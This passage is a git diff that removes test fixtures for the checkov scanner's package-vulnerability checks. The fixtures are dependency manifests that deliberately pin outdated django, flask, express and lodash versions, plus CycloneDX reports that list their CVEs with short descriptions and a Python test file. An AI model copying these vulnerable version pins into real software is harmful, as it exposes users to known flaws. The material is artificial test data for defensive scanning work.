-k8s.io/kube-openapi v0.0.0-20200410145947-61e04a5be9a6/go.mod h1:GRQhZsXIAJ1xR0C9bd8UpWHZ5plfAS9fzPjJuQ6JL3E= -k8s.io/kube-openapi 
v0.0.0-20200410145947-bcb3869e6f29/go.mod h1:F+5wygcW0wmRTnM3cOgIqGivxkwSWIWT5YdsDbeAOaU= -k8s.io/utils v0.0.0-20191114184206-e782cd3c129f/go.mod h1:sZAwmy6armz5eXlNoLmJcl4F1QuKu7sr+mFQ0byX7Ew= -layeh.com/gopher-json v0.0.0-20190114024228-97fed8db8427 h1:RZkKxMR3jbQxdCEcglq3j7wY3PRJIopAwBlx1RE71X0= -layeh.com/gopher-json v0.0.0-20190114024228-97fed8db8427/go.mod h1:ivKkcY8Zxw5ba0jldhZCYYQfGdb2K6u9tbYK1AwMIBc= -modernc.org/cc v1.0.0/go.mod h1:1Sk4//wdnYJiUIxnW8ddKpaOJCF37yAdqYnkxUpaYxw= -modernc.org/golex v1.0.0/go.mod h1:b/QX9oBD/LhixY6NDh+IdGv17hgB+51fET1i2kPSmvk= -modernc.org/mathutil v1.0.0/go.mod h1:wU0vUrJsVWBZ4P6e7xtFJEhFSNsfRLJ8H458uRjg03k= -modernc.org/strutil v1.0.0/go.mod h1:lstksw84oURvj9y3tn8lGvRxyRC1S2+g5uuIzNfIOBs= -modernc.org/xc v1.0.0/go.mod h1:mRNCo0bvLjGhHO9WsyuKVU4q0ceiDDDoEeWDJHrNx8I= -sigs.k8s.io/structured-merge-diff/v2 v2.0.1/go.mod h1:Wb7vfKAodbKgf6tn1Kl0VvGj7mRH6DGaRcixXEJXTsE= -sigs.k8s.io/structured-merge-diff/v3 v3.0.0-20200116222232-67a7b8c61874/go.mod h1:PlARxl6Hbt/+BC80dRLi1qAmnMqwqDg62YvvVkZjemw= -sigs.k8s.io/structured-merge-diff/v3 v3.0.0 h1:dOmIZBMfhcHS09XZkMyUgkq5trg3/jRyJYFZUiaOp8E= -sigs.k8s.io/structured-merge-diff/v3 v3.0.0/go.mod h1:PlARxl6Hbt/+BC80dRLi1qAmnMqwqDg62YvvVkZjemw= -sigs.k8s.io/yaml v1.1.0/go.mod h1:UJmg0vDUVViEyp3mgSv9WPwZCDxu4rQW1olrI1uml+o= -sigs.k8s.io/yaml v1.2.0 h1:kr/MCeFWJWTwyaHoR9c8EjH9OumOmoF9YGiZd7lFm/Q= -sigs.k8s.io/yaml v1.2.0/go.mod h1:yfXDCHCao9+ENCvLSE62v9VSji2MKu5jeNfTrofGhJc= diff --git a/tests/sca_package/examples/package-lock.json b/tests/sca_package/examples/package-lock.json deleted file mode 100644 index 44ecfc84160..00000000000 --- a/tests/sca_package/examples/package-lock.json +++ /dev/null 
@@ -1,143 +0,0 @@ -{ - "name": "angular-srcs", - "version": "13.1.0-next.0", - "lockfileVersion": 1, - "requires": true, - "dependencies": { - "bytes": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/bytes/-/bytes-0.1.0.tgz", - "integrity": "sha1-xXSBIigSbWNp0VdpJahXnbP45aI=" - }, - "commander": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/commander/-/commander-0.6.1.tgz", - "integrity": "sha1-+mihT2qUXVTbvlDYzbMyDp47GgY=" - }, - "connect": { - "version": "2.6.0", - "resolved": "https://registry.npmjs.org/connect/-/connect-2.6.0.tgz", - "integrity": "sha1-OdSuftTE2U2GcN/i1+ixObTerU8=", - "requires": { - "bytes": "0.1.0", - "cookie": "0.0.4", - "crc": "0.2.0", - "debug": "*", - "formidable": "1.0.11", - "fresh": "0.1.0", - "pause": "0.0.1", - "qs": "0.5.1", - "send": "0.0.4" - }, - "dependencies": { - "send": { - "version": "0.0.4", - "resolved": "https://registry.npmjs.org/send/-/send-0.0.4.tgz", - "integrity": "sha1-LUz3mxifzQlhDhMCUQrJsOTd6AA=", - "requires": { - "debug": "*", - "fresh": "0.1.0", - "mime": "1.2.6", - "range-parser": "0.0.4" - } - } - } - }, - "cookie": { - "version": "0.0.4", - "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.0.4.tgz", - "integrity": "sha1-VFa9R67iZm6sl26oCmEFlASD/pg=" - }, - "crc": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/crc/-/crc-0.2.0.tgz", - "integrity": "sha1-9Ehrm/ChLfg8P8oU4x4DD9q9lFQ=" - }, - "debug": { - "version": "4.3.3", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", - "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", - "requires": { - "ms": "2.1.2" - } - }, - "express": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/express/-/express-3.0.0.tgz", - "integrity": "sha1-QeIC82J+pEK+nobV7FEkatcjOe0=", - "requires": { - "commander": "0.6.1", - "connect": "2.6.0", - "cookie": "0.0.4", - "crc": "0.2.0", - "debug": "*", - "fresh": "0.1.0", - "methods": 
"0.0.1", - "mkdirp": "0.3.3", - "range-parser": "0.0.4", - "send": "0.1.0" - } - }, - "formidable": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/formidable/-/formidable-1.0.11.tgz", - "integrity": "sha1-aPYzJaA15kS297s9ESQ7l2HeGzA=" - }, - "fresh": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.1.0.tgz", - "integrity": "sha1-A+SwF4Qk5MLV0ZpU2IFM3JeTSFA=" - }, - "lodash": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-3.1.0.tgz", - "integrity": "sha1-1BuLM1MMs74IiFMgitMAktLCeWE=" - }, - "methods": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/methods/-/methods-0.0.1.tgz", - "integrity": "sha1-J3yQ+L7zlwlkWoNxxRw7bGSOBow=" - }, - "mime": { - "version": "1.2.6", - "resolved": "https://registry.npmjs.org/mime/-/mime-1.2.6.tgz", - "integrity": "sha1-sfhsdowCX6h7SAdfFwnyiuryA2U=" - }, - "mkdirp": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.3.3.tgz", - "integrity": "sha1-WV4lHBNww6aLqyE20ONIuBBa3xM=" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" - }, - "pause": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/pause/-/pause-0.0.1.tgz", - "integrity": "sha1-HUCLP9t2kjuVQ9lvtMnf1TXZy10=" - }, - "qs": { - "version": "0.5.1", - "resolved": "https://registry.npmjs.org/qs/-/qs-0.5.1.tgz", - "integrity": "sha1-n2v12axsdjhOldNtFbSJgOXkrdA=" - }, - "range-parser": { - "version": "0.0.4", - "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-0.0.4.tgz", - "integrity": "sha1-wEJ//vUcEKy6B4KkbJYC50T/Ygs=" - }, - "send": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/send/-/send-0.1.0.tgz", - "integrity": "sha1-z7COvTzsm3/Bo32f+eh1qXHPRkA=", - "requires": { - "debug": "*", - "fresh": "0.1.0", - "mime": "1.2.6", - 
"range-parser": "0.0.4"
- }
- }
- }
-}
diff --git a/tests/sca_package/examples/package.json b/tests/sca_package/examples/package.json
deleted file mode 100644
index dd8dfbcce20..00000000000
--- a/tests/sca_package/examples/package.json
+++ /dev/null
@@ -1,26 +0,0 @@
-{
- "name": "angular-srcs",
- "version": "13.1.0-next.0",
- "private": true,
- "description": "Angular - a web framework for modern web apps",
- "homepage": "https://github.com/angular/angular",
- "bugs": "https://github.com/angular/angular/issues",
- "license": "MIT",
- "//engines-comment": "Keep this in sync with /aio/package.json and /aio/tools/examples/shared/package.json",
- "engines": {
- "node": "^12.20.0 || ^14.15.0 || >=16.10.0",
- "yarn": ">=1.22.4 <2",
- "npm": "Please use yarn instead of NPM to install dependencies"
- },
- "repository": {
- "type": "git",
- "url": "https://github.com/angular/angular.git"
- },
- "scripts": {
- "test": "bazelisk test --build_tag_filters=-view-engine-only --test_tag_filters=-view-engine-only"
- },
- "dependencies": {
- "express": "3.0.0",
- "lodash": "3.1.0"
- }
-}
diff --git a/tests/sca_package/examples/requirements.txt b/tests/sca_package/examples/requirements.txt
deleted file mode 100644
index 557fbc0a404..00000000000
--- a/tests/sca_package/examples/requirements.txt
+++ /dev/null
@@ -1,3 +0,0 @@
-django==1.2
-flask==0.6
-requests==2.26.0
diff --git a/tests/sca_package/examples/yarn.lock b/tests/sca_package/examples/yarn.lock
deleted file mode 100644
index 3b8fb3c27db..00000000000
--- a/tests/sca_package/examples/yarn.lock
+++ /dev/null
@@ -1,17 +0,0 @@ -# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. -# yarn lockfile v1 - - -"@angular-devkit/build-optimizer@0.0.13": - version "0.0.13" - resolved "https://registry.yarnpkg.com/@angular-devkit/build-optimizer/-/build-optimizer-0.0.13.tgz#cf397af76abe899aa909d4a735106694ca1f08cf" - dependencies: - loader-utils "^1.1.0" - source-map "^0.5.6" - typescript "^2.3.3" - -"@angular/animations@^4.2.5": - version "4.3.6" - resolved "https://registry.yarnpkg.com/@angular/animations/-/animations-4.3.6.tgz#bf9283ec7c8c98b32f569d84dcda10890fdc0262" - dependencies: - tslib "^1.7.1" \ No newline at end of file diff --git a/tests/sca_package/outputs/results_cyclonedx.xml b/tests/sca_package/outputs/results_cyclonedx.xml deleted file mode 100644 index 1412100627e..00000000000 --- a/tests/sca_package/outputs/results_cyclonedx.xml +++ /dev/null 
@@ -1,367 +0,0 @@ - - - - 2023-10-12T21:55:39.825123+00:00 - - - CycloneDX - cyclonedx-python-lib - 5.0.0 - - - https://github.com/CycloneDX/cyclonedx-python-lib/actions - - - https://pypi.org/project/cyclonedx-python-lib/ - - - https://cyclonedx-python-library.readthedocs.io/ - - - https://github.com/CycloneDX/cyclonedx-python-lib/issues - - - https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/LICENSE - - - https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md - - - https://github.com/CycloneDX/cyclonedx-python-lib - - - https://github.com/CycloneDX/cyclonedx-python-lib/#readme - - - - - bridgecrew - checkov - 2.3.307 - - - https://github.com/bridgecrewio/checkov/actions - - - https://pypi.org/project/checkov/ - - - https://www.checkov.io/1.Welcome/What%20is%20Checkov.html - - - https://github.com/bridgecrewio/checkov/issues - - - https://github.com/bridgecrewio/checkov/blob/master/LICENSE - - - https://twitter.com/bridgecrewio - - - https://github.com/bridgecrewio/checkov - - - https://www.checkov.io/ - - - - - - - - django - 1.2 - - - OSI_BDS - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - flask - 0.6 - - - DUMMY_OTHER_LICENSE - - - OSI_APACHE - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6 - - - github.com/dgrijalva/jwt-go - v3.2.0 - - - Unknown - - - pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0 - - - github.com/miekg/dns - v1.1.41 - - - Unknown - - - pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41 - - - github.com/prometheus/client_model - v0.0.0-20190129233127-fd36f4220a90 - - - Unknown - - - pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90 - - - golang.org/x/crypto - v0.0.1 - - - Unknown - - - pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1 - - - requests - 2.26.0 - - - OSI_APACHE - - - 
pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0 - - - requests - 2.26.0 - - - OSI_APACHE - - - pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0 - - - - - - - - - - - - - - - CVE-2016-6186 - - https://nvd.nist.gov/vuln/detail/CVE-2016-6186 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2016-6186 - - 6.1 - medium - CVSSv3 - AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - - - Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML. - Fixed in 1.8.14 - 2016-08-05T17:59:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - - - CVE-2016-7401 - - https://nvd.nist.gov/vuln/detail/CVE-2016-7401 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2016-7401 - - 7.5 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - - - The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies. - Fixed in 1.8.15 - 2016-10-03T20:59:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - - - CVE-2018-1000656 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000656 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000656 - - 7.5 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - - - The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. 
NOTE: this may overlap CVE-2019-1010083. - Fixed in 0.12.3 - 2018-08-20T21:31:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6 - - - - - CVE-2019-1010083 - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010083 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010083 - - 7.5 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - - - The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656. - Fixed in 1.0 - 2019-07-17T16:15:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6 - - - - - CVE-2019-19844 - - https://nvd.nist.gov/vuln/detail/CVE-2019-19844 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2019-19844 - - 9.8 - critical - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - - - Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.) - Fixed in 1.11.27 - 2019-12-18T20:15:00+01:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - - - CVE-2020-26160 - - https://nvd.nist.gov/vuln/detail/CVE-2020-26160 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2020-26160 - - 7.7 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - - - jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\"aud\"] (which is allowed by the specification). Because the type assertion fails, \"\" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check. 
- Fixed in 4.0.0rc1 - 2020-09-30T20:15:00+02:00 - - - pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0 - - - - - CVE-2020-29652 - - https://nvd.nist.gov/vuln/detail/CVE-2020-29652 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2020-29652 - - 7.5 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - - - A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers. - Fixed in 0.0.2 - 2020-12-17T06:15:00+01:00 - - - pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1 - - - - - CVE-2021-33203 - - https://nvd.nist.gov/vuln/detail/CVE-2021-33203 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2021-33203 - - 4.9 - medium - CVSSv3 - AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N - - - Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories. - Fixed in 2.2.24 - 2021-06-08T20:15:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - - - diff --git a/tests/sca_package/outputs/results_cyclonedx_with_comma_in_licenses.xml b/tests/sca_package/outputs/results_cyclonedx_with_comma_in_licenses.xml deleted file mode 100644 index 62820b1cfcf..00000000000 --- a/tests/sca_package/outputs/results_cyclonedx_with_comma_in_licenses.xml +++ /dev/null 
@@ -1,367 +0,0 @@ - - - - 2023-10-12T21:56:14.367737+00:00 - - - CycloneDX - cyclonedx-python-lib - 5.0.0 - - - https://github.com/CycloneDX/cyclonedx-python-lib/actions - - - https://pypi.org/project/cyclonedx-python-lib/ - - - https://cyclonedx-python-library.readthedocs.io/ - - - https://github.com/CycloneDX/cyclonedx-python-lib/issues - - - https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/LICENSE - - - https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md - - - https://github.com/CycloneDX/cyclonedx-python-lib - - - https://github.com/CycloneDX/cyclonedx-python-lib/#readme - - - - - bridgecrew - checkov - 2.3.307 - - - https://github.com/bridgecrewio/checkov/actions - - - https://pypi.org/project/checkov/ - - - https://www.checkov.io/1.Welcome/What%20is%20Checkov.html - - - https://github.com/bridgecrewio/checkov/issues - - - https://github.com/bridgecrewio/checkov/blob/master/LICENSE - - - https://twitter.com/bridgecrewio - - - https://github.com/bridgecrewio/checkov - - - https://www.checkov.io/ - - - - - - - - django - 1.2 - - - OSI_BDS - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - flask - 0.6 - - - DUMMY_OTHER_LICENSE, ANOTHER_DOMMY_LICENSE - - - OSI_APACHE - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6 - - - github.com/dgrijalva/jwt-go - v3.2.0 - - - Unknown - - - pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0 - - - github.com/miekg/dns - v1.1.41 - - - Unknown - - - pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41 - - - github.com/prometheus/client_model - v0.0.0-20190129233127-fd36f4220a90 - - - Unknown - - - pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90 - - - golang.org/x/crypto - v0.0.1 - - - Unknown - - - pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1 - - - requests - 2.26.0 - - - OSI_APACHE - - - 
pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0 - - - requests - 2.26.0 - - - OSI_APACHE - - - pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0 - - - - - - - - - - - - - - - CVE-2016-6186 - - https://nvd.nist.gov/vuln/detail/CVE-2016-6186 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2016-6186 - - 6.1 - medium - CVSSv3 - AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - - - Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML. - Fixed in 1.8.14 - 2016-08-05T17:59:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - - - CVE-2016-7401 - - https://nvd.nist.gov/vuln/detail/CVE-2016-7401 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2016-7401 - - 7.5 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - - - The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies. - Fixed in 1.8.15 - 2016-10-03T20:59:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - - - CVE-2018-1000656 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000656 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000656 - - 7.5 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - - - The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. 
NOTE: this may overlap CVE-2019-1010083. - Fixed in 0.12.3 - 2018-08-20T21:31:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6 - - - - - CVE-2019-1010083 - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010083 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010083 - - 7.5 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - - - The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656. - Fixed in 1.0 - 2019-07-17T16:15:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6 - - - - - CVE-2019-19844 - - https://nvd.nist.gov/vuln/detail/CVE-2019-19844 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2019-19844 - - 9.8 - critical - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - - - Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.) - Fixed in 1.11.27 - 2019-12-18T20:15:00+01:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - - - CVE-2020-26160 - - https://nvd.nist.gov/vuln/detail/CVE-2020-26160 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2020-26160 - - 7.7 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - - - jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\"aud\"] (which is allowed by the specification). Because the type assertion fails, \"\" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check. 
- Fixed in 4.0.0rc1 - 2020-09-30T20:15:00+02:00 - - - pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0 - - - - - CVE-2020-29652 - - https://nvd.nist.gov/vuln/detail/CVE-2020-29652 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2020-29652 - - 7.5 - high - CVSSv3 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - - - A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers. - Fixed in 0.0.2 - 2020-12-17T06:15:00+01:00 - - - pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1 - - - - - CVE-2021-33203 - - https://nvd.nist.gov/vuln/detail/CVE-2021-33203 - - - - - https://nvd.nist.gov/vuln/detail/CVE-2021-33203 - - 4.9 - medium - CVSSv3 - AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N - - - Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories. - Fixed in 2.2.24 - 2021-06-08T20:15:00+02:00 - - - pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2 - - - - - diff --git a/tests/sca_package/test_output.py b/tests/sca_package/test_output.py deleted file mode 100644 index 9ae465ceb0b..00000000000 --- a/tests/sca_package/test_output.py +++ /dev/null 
@@ -1,665 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from packaging import version as packaging_version - -from checkov.common.bridgecrew.severities import BcSeverities, Severities -from checkov.common.models.enums import CheckResult, ScanDataFormat -from checkov.common.sca.output import create_report_cve_record, create_report_license_record -from checkov.runner_filter import RunnerFilter -from checkov.sca_package.output import ( - calculate_lowest_compliant_version, - create_cli_cves_table, - create_cli_license_violations_table, - create_cli_output, - CveCount, -) - - -def get_vulnerabilities_details() -> list[dict[str, Any]]: - return [ - { - "id": "CVE-2019-19844", - "status": "fixed in 3.0.1, 2.2.9, 1.11.27", - "cvss": 9.8, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ...", - "severity": "critical", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "Critical severity", - "Has fix", - ], - "impactedVersions": ["<1.11.27"], - "publishedDate": "2019-12-18T20:15:00+01:00", - "discoveredDate": "2019-12-18T19:15:00Z", - "fixDate": "2019-12-18T20:15:00+01:00", - }, - { - "id": "CVE-2016-6186", - "status": "fixed in 1.9.8, 1.8.14", - "cvss": 6.1, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "description": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function ...", - "severity": "medium", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "Exploit exists", - "Has fix", - "Medium severity", - ], - "impactedVersions": ["<=1.8.13"], - "publishedDate": "2016-08-05T17:59:00+02:00", - 
"discoveredDate": "2016-08-05T15:59:00Z", - "fixDate": "2016-08-05T17:59:00+02:00", - }, - ] - - -def test_create_report_cve_record(): - # given - rootless_file_path = "requirements.txt" - file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" - vulnerability_details = { - "id": "CVE-2019-19844", - "status": "fixed in 3.0.1, 2.2.9, 1.11.27", - "cvss": 9.8, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ...", - "severity": "critical", - "packageName": "django", - "packageVersion": "1.12", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"], - "impactedVersions": ["<1.11.27"], - "publishedDate": "2019-12-18T20:15:00+01:00", - "discoveredDate": "2019-12-18T19:15:00Z", - "fixDate": "2019-12-18T20:15:00+01:00", - } - - # when - record = create_report_cve_record( - rootless_file_path=rootless_file_path, - file_abs_path=file_abs_path, - check_class=check_class, - vulnerability_details=vulnerability_details, - licenses='OSI_BDS', - package={'package_registry': "https://registry.npmjs.org/", 'is_private_registry': False}, - ) - - # then - assert record.bc_check_id == "BC_CVE_2019_19844" - assert record.check_id == "CKV_CVE_2019_19844" - assert record.check_class == check_class - assert record.check_name == "SCA package scan" - assert record.check_result == {"result": CheckResult.FAILED} - assert record.code_block == [(0, "django: 1.12")] - assert ( - record.description - == "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. ..." 
- ) - assert record.file_abs_path == file_abs_path - assert record.file_line_range == [0, 0] - assert record.file_path == f"/{rootless_file_path}" - assert record.repo_file_path == file_abs_path - assert record.resource == "requirements.txt.django" - assert record.severity == Severities[BcSeverities.CRITICAL] - assert record.short_description == "CVE-2019-19844 - django: 1.12" - assert record.vulnerability_details["status"] == "fixed in 3.0.1, 2.2.9, 1.11.27" - assert record.vulnerability_details["lowest_fixed_version"] == "2.2.9" - assert record.vulnerability_details["fixed_versions"] == [ - packaging_version.parse("3.0.1"), - packaging_version.parse("2.2.9"), - ] - assert record.vulnerability_details["licenses"] == 'OSI_BDS' - - -def test_create_report_cve_record_results_from_platform(): - # given - rootless_file_path = "requirements.txt" - file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" - vulnerability_details = { - "severity": "CRITICAL", - "riskFactors": 